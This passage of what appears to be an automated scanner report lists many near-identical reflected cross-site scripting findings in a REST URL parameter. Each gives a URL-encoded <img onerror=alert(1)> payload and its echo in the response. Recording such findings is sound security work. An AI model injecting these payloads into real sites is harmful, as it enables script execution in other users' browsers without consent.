This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0add<img%20src%3da%20onerror%3dalert(1)>3a458bffe10 was submitted in the REST URL parameter 4. This input was echoed as c0add<img src=a onerror=alert(1)>3a458bffe10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eddcd<img%20src%3da%20onerror%3dalert(1)>36a4f7cabf5 was submitted in the REST URL parameter 4. This input was echoed as eddcd<img src=a onerror=alert(1)>36a4f7cabf5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7c78<img%20src%3da%20onerror%3dalert(1)>f21d66732f0 was submitted in the REST URL parameter 4. This input was echoed as d7c78<img src=a onerror=alert(1)>f21d66732f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2d290<img%20src%3da%20onerror%3dalert(1)>5ddd19d0da2 was submitted in the REST URL parameter 4. This input was echoed as 2d290<img src=a onerror=alert(1)>5ddd19d0da2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d1998<img%20src%3da%20onerror%3dalert(1)>528b4e0b9e5 was submitted in the REST URL parameter 4. This input was echoed as d1998<img src=a onerror=alert(1)>528b4e0b9e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 474f1<img%20src%3da%20onerror%3dalert(1)>5ce3405dd8e was submitted in the REST URL parameter 4. This input was echoed as 474f1<img src=a onerror=alert(1)>5ce3405dd8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5728<img%20src%3da%20onerror%3dalert(1)>b0a30417ea6 was submitted in the REST URL parameter 4. This input was echoed as d5728<img src=a onerror=alert(1)>b0a30417ea6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a76eb<img%20src%3da%20onerror%3dalert(1)>4c782d0a103 was submitted in the REST URL parameter 4. This input was echoed as a76eb<img src=a onerror=alert(1)>4c782d0a103 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 289bb<img%20src%3da%20onerror%3dalert(1)>26baf769630 was submitted in the REST URL parameter 4. This input was echoed as 289bb<img src=a onerror=alert(1)>26baf769630 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de255<img%20src%3da%20onerror%3dalert(1)>c346dbd6552 was submitted in the REST URL parameter 4. This input was echoed as de255<img src=a onerror=alert(1)>c346dbd6552 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c283f<img%20src%3da%20onerror%3dalert(1)>36eb41daa77 was submitted in the REST URL parameter 4. This input was echoed as c283f<img src=a onerror=alert(1)>36eb41daa77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c6ee0<img%20src%3da%20onerror%3dalert(1)>eee01c75e51 was submitted in the REST URL parameter 4. This input was echoed as c6ee0<img src=a onerror=alert(1)>eee01c75e51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42fb2<img%20src%3da%20onerror%3dalert(1)>9bfa309cd73 was submitted in the REST URL parameter 4. This input was echoed as 42fb2<img src=a onerror=alert(1)>9bfa309cd73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5af61<img%20src%3da%20onerror%3dalert(1)>de04cd3978d was submitted in the REST URL parameter 4. This input was echoed as 5af61<img src=a onerror=alert(1)>de04cd3978d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89278<img%20src%3da%20onerror%3dalert(1)>7f5a74568ac was submitted in the REST URL parameter 4. This input was echoed as 89278<img src=a onerror=alert(1)>7f5a74568ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5edba<img%20src%3da%20onerror%3dalert(1)>ef68be70d54 was submitted in the REST URL parameter 4. This input was echoed as 5edba<img src=a onerror=alert(1)>ef68be70d54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3981c<img%20src%3da%20onerror%3dalert(1)>f3c6a27bcdf was submitted in the REST URL parameter 4. This input was echoed as 3981c<img src=a onerror=alert(1)>f3c6a27bcdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2bd47<img%20src%3da%20onerror%3dalert(1)>32ef2fcb48c was submitted in the REST URL parameter 4. This input was echoed as 2bd47<img src=a onerror=alert(1)>32ef2fcb48c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1bec2<img%20src%3da%20onerror%3dalert(1)>800c3098bb6 was submitted in the REST URL parameter 4. This input was echoed as 1bec2<img src=a onerror=alert(1)>800c3098bb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bbe2e<img%20src%3da%20onerror%3dalert(1)>4a5863699ef was submitted in the REST URL parameter 4. This input was echoed as bbe2e<img src=a onerror=alert(1)>4a5863699ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d241<img%20src%3da%20onerror%3dalert(1)>f3192c4dd8e was submitted in the REST URL parameter 4. This input was echoed as 4d241<img src=a onerror=alert(1)>f3192c4dd8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7708a<img%20src%3da%20onerror%3dalert(1)>cea37b0dc27 was submitted in the REST URL parameter 4. This input was echoed as 7708a<img src=a onerror=alert(1)>cea37b0dc27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c626d<img%20src%3da%20onerror%3dalert(1)>f8e8550aea6 was submitted in the REST URL parameter 4. This input was echoed as c626d<img src=a onerror=alert(1)>f8e8550aea6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f3612<img%20src%3da%20onerror%3dalert(1)>8e7e91e7892 was submitted in the REST URL parameter 4. This input was echoed as f3612<img src=a onerror=alert(1)>8e7e91e7892 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cec91<img%20src%3da%20onerror%3dalert(1)>fe6601272ff was submitted in the REST URL parameter 4. This input was echoed as cec91<img src=a onerror=alert(1)>fe6601272ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61b2e<img%20src%3da%20onerror%3dalert(1)>c719197871a was submitted in the REST URL parameter 4. This input was echoed as 61b2e<img src=a onerror=alert(1)>c719197871a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fdfd6<img%20src%3da%20onerror%3dalert(1)>5225426e988 was submitted in the REST URL parameter 4. This input was echoed as fdfd6<img src=a onerror=alert(1)>5225426e988 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3b86<img%20src%3da%20onerror%3dalert(1)>2f11037b8a8 was submitted in the REST URL parameter 4. This input was echoed as c3b86<img src=a onerror=alert(1)>2f11037b8a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92ad0<img%20src%3da%20onerror%3dalert(1)>67a04e9f9ad was submitted in the REST URL parameter 4. This input was echoed as 92ad0<img src=a onerror=alert(1)>67a04e9f9ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25c5c<img%20src%3da%20onerror%3dalert(1)>acdf4b335e7 was submitted in the REST URL parameter 4. This input was echoed as 25c5c<img src=a onerror=alert(1)>acdf4b335e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1700a<img%20src%3da%20onerror%3dalert(1)>431cdd919b0 was submitted in the REST URL parameter 4. This input was echoed as 1700a<img src=a onerror=alert(1)>431cdd919b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ff769<img%20src%3da%20onerror%3dalert(1)>4cee47844e1 was submitted in the REST URL parameter 4. This input was echoed as ff769<img src=a onerror=alert(1)>4cee47844e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9574c<img%20src%3da%20onerror%3dalert(1)>fefecf03ff0 was submitted in the REST URL parameter 4. This input was echoed as 9574c<img src=a onerror=alert(1)>fefecf03ff0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7b7b8<img%20src%3da%20onerror%3dalert(1)>c0ef5bf553c was submitted in the REST URL parameter 4. This input was echoed as 7b7b8<img src=a onerror=alert(1)>c0ef5bf553c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cf073<img%20src%3da%20onerror%3dalert(1)>349e06f6aa1 was submitted in the REST URL parameter 4. This input was echoed as cf073<img src=a onerror=alert(1)>349e06f6aa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d3224<img%20src%3da%20onerror%3dalert(1)>cbeb6a32bd3 was submitted in the REST URL parameter 4. This input was echoed as d3224<img src=a onerror=alert(1)>cbeb6a32bd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57e45<img%20src%3da%20onerror%3dalert(1)>886d240528f was submitted in the REST URL parameter 4. This input was echoed as 57e45<img src=a onerror=alert(1)>886d240528f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 49714<img%20src%3da%20onerror%3dalert(1)>47a258f6aab was submitted in the REST URL parameter 4. This input was echoed as 49714<img src=a onerror=alert(1)>47a258f6aab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25fa5<img%20src%3da%20onerror%3dalert(1)>0605ce3fb60 was submitted in the REST URL parameter 4. This input was echoed as 25fa5<img src=a onerror=alert(1)>0605ce3fb60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f122e<img%20src%3da%20onerror%3dalert(1)>8fe677fa087 was submitted in the REST URL parameter 4. This input was echoed as f122e<img src=a onerror=alert(1)>8fe677fa087 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8cd2c<img%20src%3da%20onerror%3dalert(1)>1f8bc0e79cf was submitted in the REST URL parameter 4. This input was echoed as 8cd2c<img src=a onerror=alert(1)>1f8bc0e79cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34b5d<img%20src%3da%20onerror%3dalert(1)>d93ebbf56 was submitted in the REST URL parameter 4. This input was echoed as 34b5d<img src=a onerror=alert(1)>d93ebbf56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 560bb<img%20src%3da%20onerror%3dalert(1)>62ff753761b was submitted in the REST URL parameter 4. This input was echoed as 560bb<img src=a onerror=alert(1)>62ff753761b in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 44f39<img%20src%3da%20onerror%3dalert(1)>bcadb3209b2 was submitted in the REST URL parameter 4. This input was echoed as 44f39<img src=a onerror=alert(1)>bcadb3209b2 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71f65<img%20src%3da%20onerror%3dalert(1)>c40a9d0d17e was submitted in the REST URL parameter 4. This input was echoed as 71f65<img src=a onerror=alert(1)>c40a9d0d17e in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94385<img%20src%3da%20onerror%3dalert(1)>e4589bd16b0 was submitted in the REST URL parameter 4. This input was echoed as 94385<img src=a onerror=alert(1)>e4589bd16b0 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 56cd3<img%20src%3da%20onerror%3dalert(1)>61afdd70dae was submitted in the REST URL parameter 4. This input was echoed as 56cd3<img src=a onerror=alert(1)>61afdd70dae in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 24426<img%20src%3da%20onerror%3dalert(1)>eb76c2b7d07 was submitted in the REST URL parameter 4. This input was echoed as 24426<img src=a onerror=alert(1)>eb76c2b7d07 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fcae1<img%20src%3da%20onerror%3dalert(1)>20c237af538 was submitted in the REST URL parameter 4. This input was echoed as fcae1<img src=a onerror=alert(1)>20c237af538 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be7d9<img%20src%3da%20onerror%3dalert(1)>5e6ae0f073c was submitted in the REST URL parameter 4. This input was echoed as be7d9<img src=a onerror=alert(1)>5e6ae0f073c in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d09f<img%20src%3da%20onerror%3dalert(1)>4bc9fdbe473 was submitted in the REST URL parameter 4. This input was echoed as 7d09f<img src=a onerror=alert(1)>4bc9fdbe473 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 679b6<img%20src%3da%20onerror%3dalert(1)>45652ca7449 was submitted in the REST URL parameter 4. This input was echoed as 679b6<img src=a onerror=alert(1)>45652ca7449 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb519<img%20src%3da%20onerror%3dalert(1)>1304a011ff5 was submitted in the REST URL parameter 4. This input was echoed as cb519<img src=a onerror=alert(1)>1304a011ff5 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 557cd<img%20src%3da%20onerror%3dalert(1)>74814746684 was submitted in the REST URL parameter 4. This input was echoed as 557cd<img src=a onerror=alert(1)>74814746684 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97b00<img%20src%3da%20onerror%3dalert(1)>76e1c38304b was submitted in the REST URL parameter 4. This input was echoed as 97b00<img src=a onerror=alert(1)>76e1c38304b in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a39a<img%20src%3da%20onerror%3dalert(1)>4a9a17b5739 was submitted in the REST URL parameter 4. This input was echoed as 8a39a<img src=a onerror=alert(1)>4a9a17b5739 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 51ab9<img%20src%3da%20onerror%3dalert(1)>07b684bf62e was submitted in the REST URL parameter 4. This input was echoed as 51ab9<img src=a onerror=alert(1)>07b684bf62e in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87f41<img%20src%3da%20onerror%3dalert(1)>344f1a56de0 was submitted in the REST URL parameter 4. This input was echoed as 87f41<img src=a onerror=alert(1)>344f1a56de0 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b73a8<img%20src%3da%20onerror%3dalert(1)>a869a660e67 was submitted in the REST URL parameter 4. This input was echoed as b73a8<img src=a onerror=alert(1)>a869a660e67 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16c8f<img%20src%3da%20onerror%3dalert(1)>ebbc796eaf3 was submitted in the REST URL parameter 4. This input was echoed as 16c8f<img src=a onerror=alert(1)>ebbc796eaf3 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 56b0a<img%20src%3da%20onerror%3dalert(1)>9b1e6a14d99 was submitted in the REST URL parameter 4. This input was echoed as 56b0a<img src=a onerror=alert(1)>9b1e6a14d99 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60e50<img%20src%3da%20onerror%3dalert(1)>105ed31e3a1 was submitted in the REST URL parameter 4. This input was echoed as 60e50<img src=a onerror=alert(1)>105ed31e3a1 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82005<img%20src%3da%20onerror%3dalert(1)>f7417a937a was submitted in the REST URL parameter 4. This input was echoed as 82005<img src=a onerror=alert(1)>f7417a937a in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf11a<img%20src%3da%20onerror%3dalert(1)>b2a55de1d7f was submitted in the REST URL parameter 4. This input was echoed as bf11a<img src=a onerror=alert(1)>b2a55de1d7f in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f66e<img%20src%3da%20onerror%3dalert(1)>4eb36ef817c was submitted in the REST URL parameter 4. This input was echoed as 6f66e<img src=a onerror=alert(1)>4eb36ef817c in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 35fb9<img%20src%3da%20onerror%3dalert(1)>77ca712fdaa was submitted in the REST URL parameter 4. This input was echoed as 35fb9<img src=a onerror=alert(1)>77ca712fdaa in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a524<img%20src%3da%20onerror%3dalert(1)>285e07c9753 was submitted in the REST URL parameter 4. This input was echoed as 8a524<img src=a onerror=alert(1)>285e07c9753 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec7f7<img%20src%3da%20onerror%3dalert(1)>042a2b90b3c was submitted in the REST URL parameter 4. This input was echoed as ec7f7<img src=a onerror=alert(1)>042a2b90b3c in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33c3<img%20src%3da%20onerror%3dalert(1)>81badf9861 was submitted in the REST URL parameter 4. This input was echoed as b33c3<img src=a onerror=alert(1)>81badf9861 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8889d<img%20src%3da%20onerror%3dalert(1)>01d9ca41aeb was submitted in the REST URL parameter 4. This input was echoed as 8889d<img src=a onerror=alert(1)>01d9ca41aeb in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d4936<img%20src%3da%20onerror%3dalert(1)>a8983b2e578 was submitted in the REST URL parameter 4. This input was echoed as d4936<img src=a onerror=alert(1)>a8983b2e578 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53e9d<img%20src%3da%20onerror%3dalert(1)>9227fd9ac38 was submitted in the REST URL parameter 4. This input was echoed as 53e9d<img src=a onerror=alert(1)>9227fd9ac38 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7564<img%20src%3da%20onerror%3dalert(1)>ae4a8344046 was submitted in the REST URL parameter 4. This input was echoed as d7564<img src=a onerror=alert(1)>ae4a8344046 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80c46<img%20src%3da%20onerror%3dalert(1)>de7e3ff4af6 was submitted in the REST URL parameter 4. This input was echoed as 80c46<img src=a onerror=alert(1)>de7e3ff4af6 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d7ba4<img%20src%3da%20onerror%3dalert(1)>e2aa5885018 was submitted in the REST URL parameter 4. This input was echoed as d7ba4<img src=a onerror=alert(1)>e2aa5885018 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3add1<img%20src%3da%20onerror%3dalert(1)>28f4f2fac2 was submitted in the REST URL parameter 4. This input was echoed as 3add1<img src=a onerror=alert(1)>28f4f2fac2 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload afdad<img%20src%3da%20onerror%3dalert(1)>75e3f56b32f was submitted in the REST URL parameter 4. This input was echoed as afdad<img src=a onerror=alert(1)>75e3f56b32f in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f7f7<img%20src%3da%20onerror%3dalert(1)>ad010335fe7 was submitted in the REST URL parameter 4. This input was echoed as 8f7f7<img src=a onerror=alert(1)>ad010335fe7 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ca3c<img%20src%3da%20onerror%3dalert(1)>f9e63221fc9 was submitted in the REST URL parameter 4. This input was echoed as 9ca3c<img src=a onerror=alert(1)>f9e63221fc9 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78570<img%20src%3da%20onerror%3dalert(1)>025efdce66a was submitted in the REST URL parameter 4. This input was echoed as 78570<img src=a onerror=alert(1)>025efdce66a in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b04b3<img%20src%3da%20onerror%3dalert(1)>60a0eba2e53 was submitted in the REST URL parameter 4. This input was echoed as b04b3<img src=a onerror=alert(1)>60a0eba2e53 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 68016<img%20src%3da%20onerror%3dalert(1)>2ef5a5bf0eb was submitted in the REST URL parameter 4. This input was echoed as 68016<img src=a onerror=alert(1)>2ef5a5bf0eb in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9d8e6<img%20src%3da%20onerror%3dalert(1)>23eed6dea83 was submitted in the REST URL parameter 4. This input was echoed as 9d8e6<img src=a onerror=alert(1)>23eed6dea83 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6d4c3<img%20src%3da%20onerror%3dalert(1)>e79e5035c5e was submitted in the REST URL parameter 4. This input was echoed as 6d4c3<img src=a onerror=alert(1)>e79e5035c5e in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f70be<img%20src%3da%20onerror%3dalert(1)>e7af45d49d9 was submitted in the REST URL parameter 4. This input was echoed as f70be<img src=a onerror=alert(1)>e7af45d49d9 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cffb6<img%20src%3da%20onerror%3dalert(1)>337232d97f9 was submitted in the REST URL parameter 4. This input was echoed as cffb6<img src=a onerror=alert(1)>337232d97f9 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95688<img%20src%3da%20onerror%3dalert(1)>9c4f9081633 was submitted in the REST URL parameter 4. This input was echoed as 95688<img src=a onerror=alert(1)>9c4f9081633 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 32fdf<img%20src%3da%20onerror%3dalert(1)>3a0ecae438c was submitted in the REST URL parameter 4. This input was echoed as 32fdf<img src=a onerror=alert(1)>3a0ecae438c in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 96dcd<img%20src%3da%20onerror%3dalert(1)>49fb4dde708 was submitted in the REST URL parameter 4. This input was echoed as 96dcd<img src=a onerror=alert(1)>49fb4dde708 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6707c<img%20src%3da%20onerror%3dalert(1)>38418db140 was submitted in the REST URL parameter 4. This input was echoed as 6707c<img src=a onerror=alert(1)>38418db140 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e178<img%20src%3da%20onerror%3dalert(1)>49f933ea5e7 was submitted in the REST URL parameter 4. This input was echoed as 1e178<img src=a onerror=alert(1)>49f933ea5e7 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2106e<img%20src%3da%20onerror%3dalert(1)>e3a1d7ad873 was submitted in the REST URL parameter 4. This input was echoed as 2106e<img src=a onerror=alert(1)>e3a1d7ad873 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ed90<img%20src%3da%20onerror%3dalert(1)>99806ff0896 was submitted in the REST URL parameter 4. This input was echoed as 4ed90<img src=a onerror=alert(1)>99806ff0896 in the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f58d7<img%20src%3da%20onerror%3dalert(1)>7d70f72ae03 was submitted in the REST URL parameter 4. This input was echoed as f58d7<img src=a onerror=alert(1)>7d70f72ae03 in the application's response.
